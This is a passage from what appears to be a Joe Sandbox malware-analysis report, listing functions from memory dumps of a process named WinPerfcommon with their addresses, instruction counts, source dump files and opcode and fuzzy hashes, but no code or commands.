                                                                                      • Opcode Fuzzy Hash: 1dd3db9a5fd2f27f40a37a2b0b6743c97641ed430c09f4147aa70869afb9d378
                                                                                      • Instruction Fuzzy Hash: 1A517F71E0A54E8FDB68DFA8C4655FCB7B1FF44300F1140BAC01EA72A2CA782A02CB50
                                                                                      Function 00007FFD9B80151A Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .L_^
                                                                                      • API String ID: 0-2849591005
                                                                                      • Opcode ID: 40924f6a231e2241dd1e224c9d17ecae748682432ea82b3a54d936aabf1ef2b5
                                                                                      • Instruction ID: 6425a4fe0c043d9d3b8df8fae8fa7c0650d002b971537a279f7b0d300ec00a60
                                                                                      • Opcode Fuzzy Hash: 40924f6a231e2241dd1e224c9d17ecae748682432ea82b3a54d936aabf1ef2b5
                                                                                      • Instruction Fuzzy Hash: 8531C71BF0E2E60BD311F76DA8B64E93B60DF8233971941F7D1994A093EC0915468391
                                                                                      Function 00007FFD9BC132D9 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: W
                                                                                      • API String ID: 0-655174618
                                                                                      • Opcode ID: 81e308035f82e5f89c07dbdaad938cccf14a4d9da7ae1331d583395ac0361155
                                                                                      • Instruction ID: e68374cf02792f3395c4db833a88ce98fb327b66d7bfecb64be2d6bbf1f62dbe
                                                                                      • Opcode Fuzzy Hash: 81e308035f82e5f89c07dbdaad938cccf14a4d9da7ae1331d583395ac0361155
                                                                                      • Instruction Fuzzy Hash: F4217B52B1EACA5BD795A77844745B27F90EF92325B0845FAD0CDC71D3DE14740AC340
                                                                                      Function 00007FFD9BC1DC0D Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: W
                                                                                      • API String ID: 0-655174618
                                                                                      • Opcode ID: 4fb896278a6b9c22b3c9ffb8ff7cb61f68b6c688e01d16cb6906d0916cc0d87c
                                                                                      • Instruction ID: e97337ebb0776d17e7b5340578b4096fefbb4898aa98976d7ec4a4b1c73152b6
                                                                                      • Opcode Fuzzy Hash: 4fb896278a6b9c22b3c9ffb8ff7cb61f68b6c688e01d16cb6906d0916cc0d87c
                                                                                      • Instruction Fuzzy Hash: C621475171EACA0FC796AB384874AA6BFA0EF62210B0545FBD0CAC71E7DD182409C341
                                                                                      Function 00007FFD9BC1F250 Relevance: 1.3, Strings: 1, Instructions: 87COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: eneric
                                                                                      • API String ID: 0-4109413733
                                                                                      • Opcode ID: 45da52b23ca1e0a83efa028694debfc3eb4eb1f933b9871b3ca6e0395c45d2ea
                                                                                      • Instruction ID: 040ca92f0314e4d44a0f7d57111efb0c829c47a56fcd941043f5c1b642ef9021
                                                                                      • Opcode Fuzzy Hash: 45da52b23ca1e0a83efa028694debfc3eb4eb1f933b9871b3ca6e0395c45d2ea
                                                                                      • Instruction Fuzzy Hash: 56318B10A1D5DB4AE739C36844705FC7B91EF5230171E86BAC09ADF6E7C82CB582C341
                                                                                      Function 00007FFD9BC1619D Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: H
                                                                                      • API String ID: 0-2852464175
                                                                                      • Opcode ID: 1d38aa3b8211ad2365e27eb306b3a5a7c3b93d52d2b795832bff87ab1585efca
                                                                                      • Instruction ID: 7b0c2aba76e1c90cd22d1bd64e72fcd185487c4c8c39adba486c8425b76f7662
                                                                                      • Opcode Fuzzy Hash: 1d38aa3b8211ad2365e27eb306b3a5a7c3b93d52d2b795832bff87ab1585efca
                                                                                      • Instruction Fuzzy Hash: EFF0372585D3C54FC3029B70CC14A967FE4EF4B214B0A82EAD089CB562D76C954ACB12
                                                                                      Function 00007FFD9BC1C962 Relevance: 1.3, Strings: 1, Instructions: 36COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: U
                                                                                      • API String ID: 0-3372436214
                                                                                      • Opcode ID: 567b924fb1f4a46ce5fe4dc8b03bf82ab356c82373488e0db3b80ed3c5a74119
                                                                                      • Instruction ID: 37c673b2125ee7fa8a201b1d27ec182badb68ea1b55745d8f8c3b1eb9254fdce
                                                                                      • Opcode Fuzzy Hash: 567b924fb1f4a46ce5fe4dc8b03bf82ab356c82373488e0db3b80ed3c5a74119
                                                                                      • Instruction Fuzzy Hash: 4EF0F63144E3CA9FD3129BB0C8655DA3FB4AF03315F1900F6E459CB0B2C62C6606C761
                                                                                      Function 00007FFD9BC179B0 Relevance: .7, Instructions: 699COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 98fe0b36f75c9821c81b64976bb778e76fd08d4d4782c36a835fcb99c2e92248
                                                                                      • Instruction ID: c2026b4819aaa34e777675a72ff1a905b7fb7974b1b73f03504f3665d55ecb7d
                                                                                      • Opcode Fuzzy Hash: 98fe0b36f75c9821c81b64976bb778e76fd08d4d4782c36a835fcb99c2e92248
                                                                                      • Instruction Fuzzy Hash: E032B770B0DA0D8FDBA8DB58C8A5A7977E2FF54310B1151BAD04ED72A2DE24AD41CB81
                                                                                      Function 00007FFD9BC12541 Relevance: .6, Instructions: 616COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8ebd8da11cae7dd0a5898ff5538540f6af773426cb514f9c8406cf3eead5345d
                                                                                      • Instruction ID: 50021edbef7f2f49989bb3b6155351d44b88556ec3972bed0431d0a44e99e50a
                                                                                      • Opcode Fuzzy Hash: 8ebd8da11cae7dd0a5898ff5538540f6af773426cb514f9c8406cf3eead5345d
                                                                                      • Instruction Fuzzy Hash: 48120934B0DA1D8FDB68DBA8C8A597973E1FF54314B1141B9D00EDB2A2DE24ED41CB80
                                                                                      Function 00007FFD9BC19C2F Relevance: .4, Instructions: 424COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4293dfdf934ca1472b0c4b54e529b3150e88b4d80e55f3755f4b613b94c88bcd
                                                                                      • Instruction ID: 797e60c0722d3ec5c295c0505540ace5b8754be8d7b5cc245d6acfca3566f946
                                                                                      • Opcode Fuzzy Hash: 4293dfdf934ca1472b0c4b54e529b3150e88b4d80e55f3755f4b613b94c88bcd
                                                                                      • Instruction Fuzzy Hash: 7EF105306195498FEB59CF68C4E46B83BA1FF45300B5551BDD84BCB69BCA38F982CB81
                                                                                      Function 00007FFD9BC145DF Relevance: .3, Instructions: 334COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 42b6a366ebb6e234e4b6d368f5b17573e03374daec2956bcf3a5b8d0f7b972d9
                                                                                      • Instruction ID: 7f1424f168bad3c18455f908eac092a01223332358737ac872eb296521691899
                                                                                      • Opcode Fuzzy Hash: 42b6a366ebb6e234e4b6d368f5b17573e03374daec2956bcf3a5b8d0f7b972d9
                                                                                      • Instruction Fuzzy Hash: 54C1E33061A54A9FEB2DCF68C0E05B937A1FF46310B5555BDC85B8B69BCA38F581CB80
                                                                                      Function 00007FFD9BC19C4F Relevance: .3, Instructions: 333COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f4b2d496db764e43e90e671ca8749246a5850c3ee21c535ee9cfde15c9e17f31
                                                                                      • Instruction ID: 617147617dfe5a247887bac854cba049bfa485661c072c40c56b299ba2a2b226
                                                                                      • Opcode Fuzzy Hash: f4b2d496db764e43e90e671ca8749246a5850c3ee21c535ee9cfde15c9e17f31
                                                                                      • Instruction Fuzzy Hash: 4CC1053061A54A8FEB1DCF68C0E45B43BA1FF45300B5555BDD88B8B59BC638F582CB81
                                                                                      Function 00007FFD9BC13E72 Relevance: .3, Instructions: 327COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 64c8416027a62cc8dadcbbc9aad47d9f8926d9ad944dce289991068a64ff0a8d
                                                                                      • Instruction ID: 70c63a4cd34bc702b284a19e7757628a40e137b73e8e10f3f99b0fe32d4ab479
                                                                                      • Opcode Fuzzy Hash: 64c8416027a62cc8dadcbbc9aad47d9f8926d9ad944dce289991068a64ff0a8d
                                                                                      • Instruction Fuzzy Hash: 58C1F230B0DA4A9FE759DB68C0A16A8B7A1FF59300F1551BDC04EC7A96CB38B951CB80
                                                                                      Function 00007FFD9BC2FAEE Relevance: .3, Instructions: 308COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 284d3dcfa009c461da2e8128e690322552724cb3363ad3a89cc7bd42fd64ab74
                                                                                      • Instruction ID: ee3b35869dd6de4bdbf6d3a47d2dfa208ef069d5cb31cb41a64515224b54b6c6
                                                                                      • Opcode Fuzzy Hash: 284d3dcfa009c461da2e8128e690322552724cb3363ad3a89cc7bd42fd64ab74
                                                                                      • Instruction Fuzzy Hash: 7EA1203164C94D8FDF98EF68C4A8E6977E1FF69301B1545A9D40AC72A2DE20FD80CB81
                                                                                      Function 00007FFD9BC1BE19 Relevance: .3, Instructions: 306COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5cf9cc8ec4c4530859f257a86ed838e1bc6c4a230841d17ae87f9ad09425b58
                                                                                      • Instruction ID: 4765ca7275a4977e664082e8fa8091bf3d8d8ac67912201b06e863ea3b8bb429
                                                                                      • Opcode Fuzzy Hash: c5cf9cc8ec4c4530859f257a86ed838e1bc6c4a230841d17ae87f9ad09425b58
                                                                                      • Instruction Fuzzy Hash: 74918F3560E58D4FD378DA7888655BD37D0FF45310B0612B9D09ED75B3DD28AA068F81
                                                                                      Function 00007FFD9BC16F27 Relevance: .3, Instructions: 305COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 24b6b1c0de40cbad4ff1815e04d89dcb6dfeb561a2c237e511d17aa45ba3fc25
                                                                                      • Instruction ID: 23f1dbc62957556a9d09fdc31c3ae67a6709db9c9ba71edfb508f69c5df8ab3b
                                                                                      • Opcode Fuzzy Hash: 24b6b1c0de40cbad4ff1815e04d89dcb6dfeb561a2c237e511d17aa45ba3fc25
                                                                                      • Instruction Fuzzy Hash: 0C21D693F0F19F86F7356AF828351FC26409F85320F7B25BBD44DA61E6DC0C2A461282
                                                                                      Function 00007FFD9BC1954F Relevance: .3, Instructions: 289COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 12ff8e56cfcd92b783dde78e31b9a021b319ebc78bacc3cc7f9066b7661d94ae
                                                                                      • Instruction ID: 2a98f0a456da69373148e663046581af3f908fc963544847f114f9d041e61d49
                                                                                      • Opcode Fuzzy Hash: 12ff8e56cfcd92b783dde78e31b9a021b319ebc78bacc3cc7f9066b7661d94ae
                                                                                      • Instruction Fuzzy Hash: C1A1353060DA4A8FE759DF68C0A46B8B7E0FF44300F5551B9C04EC7AA6DB68F952CB90
                                                                                      Function 00007FFD9BC1185D Relevance: .3, Instructions: 287COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 912892ef12d2445afc1b92b4290e6a7d57d6b5486d25ec12030e1668b482c78d
                                                                                      • Instruction ID: c305bd70c3aee5733ae9e93c9741b2a11b8541d2787ee5fe7ce7b7cd9403dd5b
                                                                                      • Opcode Fuzzy Hash: 912892ef12d2445afc1b92b4290e6a7d57d6b5486d25ec12030e1668b482c78d
                                                                                      • Instruction Fuzzy Hash: 4B11B112F1F5DF8AF67896F524311BC5E805F90710F5B62BAD44EA60E6DC4C2B852386
                                                                                      Function 00007FFD9BC18C85 Relevance: .3, Instructions: 279COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 16bf928b6e97c867995df393a2442e4a73e560e4eca285279704f6964f2dce63
                                                                                      • Instruction ID: 05933c6ecb03a1006a2a4cd4970d261d1eacf27fcec1416144ed522a418c9fc8
                                                                                      • Opcode Fuzzy Hash: 16bf928b6e97c867995df393a2442e4a73e560e4eca285279704f6964f2dce63
                                                                                      • Instruction Fuzzy Hash: 6B715870B0D7894FE32D9F3898651797BE0EF46310F15007EE8CFD72A2DA24A9028796
                                                                                      Function 00007FFD9BC11884 Relevance: .3, Instructions: 272COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4369a4586613f089385a2e7383d75b28b9970e5cacc2d0bb4a95548b23c01079
                                                                                      • Instruction ID: c0c936267e4870cffc63b7f5232a3f9c0a09cbf624c45f76e3f828caf99af1de
                                                                                      • Opcode Fuzzy Hash: 4369a4586613f089385a2e7383d75b28b9970e5cacc2d0bb4a95548b23c01079
                                                                                      • Instruction Fuzzy Hash: 10118212F1F6CF8AF37996F4143417C5D905F91720F1B62BAD44DA61E6EC4C2A446382
                                                                                      Function 00007FFD9BC1DCD6 Relevance: .3, Instructions: 261COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac63ceada945b3aece900870d87e3c3d52bd6f249b691e626defd4d822afc701
                                                                                      • Instruction ID: ec0cb5481523d08b25142a9da7bf3b852d6d36c54c4ccff102ea204f5a679d8c
                                                                                      • Opcode Fuzzy Hash: ac63ceada945b3aece900870d87e3c3d52bd6f249b691e626defd4d822afc701
                                                                                      • Instruction Fuzzy Hash: EE817A31B0EB4A4FE3399BB8846117D77E0EF85310B16157ED48FD31A2CE28BA428752
                                                                                      Function 00007FFD9BC18A26 Relevance: .3, Instructions: 251COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4bf66b0f52212907599547eec93ab9014fdf1e55b8f454597ed5a0e5f6a79942
                                                                                      • Instruction ID: b421419308a1ba756ded4a800aedbe712006f48ab1175683dddeca63a58a16f2
                                                                                      • Opcode Fuzzy Hash: 4bf66b0f52212907599547eec93ab9014fdf1e55b8f454597ed5a0e5f6a79942
                                                                                      • Instruction Fuzzy Hash: 2C815931B0EA4A8FE3389A78986157D77E0EF41310B16557ED48FE31E2DE28BA428741
                                                                                      Function 00007FFD9BC10825 Relevance: .2, Instructions: 250COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: df5275d2cde7ee8863d061afcd287febaf9b34a8831fdaffc7e3288db17168c9
                                                                                      • Instruction ID: c3ef158b0037c01a47e0770464a283c77aac1a95b48efe5f39a99c41872d45d8
                                                                                      • Opcode Fuzzy Hash: df5275d2cde7ee8863d061afcd287febaf9b34a8831fdaffc7e3288db17168c9
                                                                                      • Instruction Fuzzy Hash: 74712731B0F68A4FE726DBB4C8716A83BA1EF52710F1A41F7C448DB1E7C928A9458391
                                                                                      Function 00007FFD9BC120CB Relevance: .2, Instructions: 236COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6aebe91685924ee3a7e717c4a02a87c43c2df6e17645858fcd61ee1b714ff7e9
                                                                                      • Instruction ID: d1300a62ee467065e7c3d14cb1b1e822bd68761a1e5ceae60b9ff085d3b0e55d
                                                                                      • Opcode Fuzzy Hash: 6aebe91685924ee3a7e717c4a02a87c43c2df6e17645858fcd61ee1b714ff7e9
                                                                                      • Instruction Fuzzy Hash: 3771D335E1D54E8EEB65DBF488646FC7BB1FF49314F2105B9D00EEB1A1DA286A41C740
                                                                                      Function 00007FFD9BC16BED Relevance: .2, Instructions: 234COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 33383d3051f9adb4a2a175f06a8d945b63972d6d23f890750cb5366a160263aa
                                                                                      • Instruction ID: b1772d247554f4b9b2fbb6f5538fe3cefcd4e4241a93c2e7d9550fd299f8c8d2
                                                                                      • Opcode Fuzzy Hash: 33383d3051f9adb4a2a175f06a8d945b63972d6d23f890750cb5366a160263aa
                                                                                      • Instruction Fuzzy Hash: F2712731A0E58D4FD778EB7888765BD37D0EF4531070612B9E49EC75B2DE18AA068781
                                                                                      Function 00007FFD9BC1779B Relevance: .2, Instructions: 230COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1d12cc45da147a7c740998dcb1445edfa0958370283fea18d420984ea422e4be
                                                                                      • Instruction ID: 9f218ba86a20deda4588fb8293d73b03b1ec7f327a0b87cb898db6ac10f9857b
                                                                                      • Opcode Fuzzy Hash: 1d12cc45da147a7c740998dcb1445edfa0958370283fea18d420984ea422e4be
                                                                                      • Instruction Fuzzy Hash: 5571D470E1D64E8EEB66DBB488646BC7BB1EF45300F1100BBD01EE71E2EE286A45C751
                                                                                      Function 00007FFD9BC1E80E Relevance: .1, Instructions: 149COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4284f029f71f22f3a3e9e61c7473a4f0844f4448dd3f5aff0c71d6d29253c6a9
                                                                                      • Instruction ID: 076563bd5fa55ce25ffdbbc4c112bd698f294052232d6ac58fdebe060d42a14f
                                                                                      • Opcode Fuzzy Hash: 4284f029f71f22f3a3e9e61c7473a4f0844f4448dd3f5aff0c71d6d29253c6a9
                                                                                      • Instruction Fuzzy Hash: CD51B130B1994B8BE798EF68C0A16B8B791FF58300F559579C01EC7AD6DB34F9518B80
                                                                                      Function 00007FFD9B8008E8 Relevance: .1, Instructions: 132COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1817243924.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b800000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a539b0af57a56583580d506aa6bc146903a99ba81b43c7a122b4e1b9ba783ef7
                                                                                      • Instruction ID: 2761759e81947a5093958c23de8481e57aebe09574555968010ddb6069de3958
                                                                                      • Opcode Fuzzy Hash: a539b0af57a56583580d506aa6bc146903a99ba81b43c7a122b4e1b9ba783ef7
                                                                                      • Instruction Fuzzy Hash: 9131253170D9194FE768EB5CE89AAB977D0FF8932170601BAE4CAC7176DD11AC8287C1
                                                                                      Function 00007FFD9BC15C27 Relevance: .1, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1822263514.00007FFD9BC10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ffd9bc10000_WinPerfcommon.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7412e531a64bb2b1160596a515f09f9513d56622e7e0bf2dfa9c05353a0e0d8e
                                                                                      • Instruction ID: 6e488cb6add653154efb24063d94a978fa5ce0f03781afa0610659970d3862ed
                                                                                      • Opcode Fuzzy Hash: 7412e531a64bb2b1160596a515f09f9513d56622e7e0bf2dfa9c05353a0e0d8e
                                                                                      • Instruction Fuzzy Hash: F941523160D9498FDF58EF6CC4A5DA977E1FBA9320B0505AED05EC3292DE21F885CB81
                                                                                      Function 00007FFD9BC1B297 Relevance: .1, Instructions: 127COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
